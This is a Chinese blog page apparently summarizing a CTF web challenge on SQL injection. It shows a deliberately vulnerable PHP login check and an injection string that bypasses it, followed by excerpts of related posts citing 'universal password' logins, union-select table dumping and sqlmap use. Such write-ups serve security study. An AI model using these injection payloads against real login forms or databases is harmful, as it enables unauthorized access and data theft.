CTF web总结--sql注入

最新推荐文章于 2024-07-30 09:36:23 发布
最新推荐文章于 2024-07-30 09:36:23 发布
阅读量1.6k 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20817327/article/details/77725801
版权 
<?php
include "common.php";

if (isset($_POST["name"])){
  $name = str_replace("'", "", trim($_POST["name"]));
  if (strlen($name) > 10){
    echo("<script>alert('too long')</script>");
  }else{
    $sql = "select count(*) count from info where username = '$name' or nickname = '$name'";

    $row = my_mysql_query($sql);

    if ($row["count"]){
      $_SESSION["rank"] = "1";
      $url = "backup_56fe708ed9f57c959fa44e313687739f.tar.gz";
      echo $url;
      header("Location: ./route.php?m=login");
      exit();
    }else{
      echo("<script>alert('go go go go ...')</script>");
    }  
  }
}
?>

构造'or 1=1#\'select count(*) count from info where username = ''or 1=1#\'' or nickname = ''or 1=1#\''

bob62856
关注
专栏目录
CTF WEB套路总结
2301_79880725的博客
01-28 1035
----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | 2 | 3 | +----+----------+----------+ 1 row in set (0.00 sec) #大小写绕过。strcmp(str1,str2):若所有的字符串均相同,则返回STRCMP(),若根据当前分类次序,第一个参数小于第二个,则返回 -1,其它情况返回 1。
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 435
个人CTF学习之路
CTF web总结
giantbranch的专栏
04-09 8万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/50959166 本文根据自己的做题经验及各大练习平台不断更新,若我最近懒了,没怎么更新,请在下面提醒我或鼓励我 仅作为自己的笔记及刚入门的童鞋,大牛勿喷 基础篇   1.直接查看源代码   http:/...
CTF学习笔记汇总(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
07-30 662
protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见,也就不能输出。因此保护类的变量在序列化时,前面会加上\0*\0的前缀。因为是强类型比较,用0e开头的字符串是没办法绕过的了,但是PHP自身的特性使得可以提交一个数组,而md5函数传入数组的返回值都是NULL,这样就可以绕过强类型比较了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
CTFSQL注入总结
weixin_41607190的博客
10-09 1170
第一题原理:输入一个小数,利用intval()函数返回整数的结果,使得if($_GET[id]==1024)判断不成立,执行else语句 这题我们就可以输入1024.1,intval()返回的结果就是1024,而$_GET[id]获取到的是1024.1,恰好和1024不相等 第二题原理:看!strcasecmp($pass, $query[pw])和$pass = md5($_POST[pass...
CTF WEB总结
热门推荐
夏日 の blog
02-06 11万+
1.http协议报头 使用referer字段来伪造来源 问:某些页面要求你必须要通过http://www.xxxx.com进行访问? 答:增加一个referer字段 Referrer:http://www.xxxx.com (题目要求的url) 使用X-Forwarded-For来伪造ip 问:题目要求必须是某个ip地址如1.1.1.1,才允许访问。 答:增加一个X-Forwarded-For字...
CTF总结WEB
醉等佳人归
06-06 431
文章目录1.工具2.信息收集类解题3.前端代码类解题4.HTTP协议类解题5.SQL注入攻击5.1.经典万能密码6.文件上传漏洞6.1.文件上传流程和上传攻击6.2.WebShell 1.工具 火狐浏览器,HackBar,BurpSuite 2.信息收集类解题 信息收集的题目考题一般是收集关于目标网站的信息,如前端页面提示与HTTP源码、返回包请求包信息、网站路径文件等,根据这些信息分析得到flag。简单的题目是直接在源码中就可以获取到flag,复杂些的需要深入收集信息。 3.前端代码类解题 前端代码的题
CTF---Web---SQL注入---07---注入点+level
qq_22160557的博客
07-31 489
文章目录前言一、题目描述二、解题步骤1、寻找注入点2、请求包保存3、sqlmap爆破三、总结 前言 题目分类: CTFWebSQL注入—07—注入点+level 一、题目描述 题目:添加备注 二、解题步骤 1、寻找注入点 Step1:本题在常规注入的地方,是无法注入的:但是这是下面有个添加备注的地方 2、请求包保存 Step2:添加备注后,抓包后,保存为txt文件 3、sqlmap爆破 Step3:丢到sqlmap中跑就行了。 注入点为id,注入类型为以时间为基础的时间盲注。 Step4:爆
CTF---Web---SQL注入---01---万能密码+sqlmap
qq_22160557的博客
07-29 3737
文章目录前言一、题目描述二、解题步骤1. 万能密码登录2. sqlmap爆库3. 爆表4. 爆列5. 爆字段三、总结 前言 题目分类: CTFWebSQL注入—01—万能密码+sqlmap 一、题目描述 题目:SQL注入 链接:192.168.87.172 二、解题步骤 1. 万能密码登录 Step1:尝试万能密码:user=‘=’,pass=‘=’,输入后登录成功,注入点在此 2. sqlmap爆库 Step2:源代码中提示,提交方法为POST,所以此题为sqlmap的post注入,采用kai
CTF---Web---SQL注入---02---sqlmap常规模式
qq_22160557的博客
07-29 439
文章目录前言一、题目描述二、解题步骤1、id查询2、sqlmap跑URL总结 前言 题目分类: CTFWebSQL注入—02—sqlmap常规模式 一、题目描述 题目:sql注入 链接:192.168.87.184 提示:order 二、解题步骤 1、id查询 Step1:根据id查询一下,url变成了 http://192.168.87.184/?order=id&button=submit 由链接可知,此为get传参。 2、sqlmap跑URL Step2:利用kali中的sqlma
CTF---Web---SQL注入---11---注入列的选择与id的值
qq_22160557的博客
08-01 825
文章目录前言一、题目描述二、解题步骤1、尝试列数2、爆表的两种方式3、爆列、字段三、总结 前言 题目分类: CTFWebSQL注入—11—注入列的选择与id的值 一、题目描述 题目:SQL注入 二、解题步骤 1、尝试列数 Step1:尝试列数,1 union select 1,2,3,4# 列数为4列 1 union select 1,2,database(),4# 数据库名为:inject_05 2、爆表的两种方式 Step2:爆表 -1 union select 1,(select grou
ctfweb题型总结大全(例题wp都有)
04-17
欢迎关注hacking水友攻防实验室,更多内容都在微信公众号
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
CTF web安全经典例题讲解
10-22
该内容为CTF赛题web安全经理例题讲解,包含sql注入,密码学、文件上传,提权、抓包改包等多种题型讲解,图文结合,适合新手学习。
CTF|WEB学习总结
weixin_43340821的博客
08-07 1501
目录SSHSMB信息泄露FTP服务后门利用Capture the Flag SSH GET -从指定资源请求数据:用GET给后端传参的方法:在?后跟变量,不同变量之间用&隔开 POST- 从指定资源提交要被处理的数据 robots.txt:爬虫协议文件:存放于网站根目录下的ASCII编码的文本文件,存放不允许搜索引擎探测和允许探测的文件名 信息探测 渗透:针对服务器的漏洞探测,进行对应数据包的发送,获取机器最高权限。‘ – nmap -sV 靶场IP地址 挖掘开放服务信息 探测靶场开放的服务与服务
CTF总结-WEB
qq_42747131的博客
05-12 2118
WEB知识点整理 常见的备份文件格式:.git .svn .swp .svn .~ .bak .bash_history 比如主页文件是index.php,那么它的备份可能就是index.php.bak,此时直接作为url输入即可下载备份, 如[ www.baidu.com/index.php.bak ](然而百度的并不能) robots协议:参考博客 cookies、会话:参考博客1、参考博客2 GET转POST:参考博客 主要是记住这句话 Content-Type: application
CTF——web个人总结
recover517的博客
05-28 1万+
包含个人总结的解题思路、注入思路、文件包含思路、源码审计思路等
CTF Web方向考点总结
qq_41513009的博客
09-20 1万+
ctf web考点总结
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值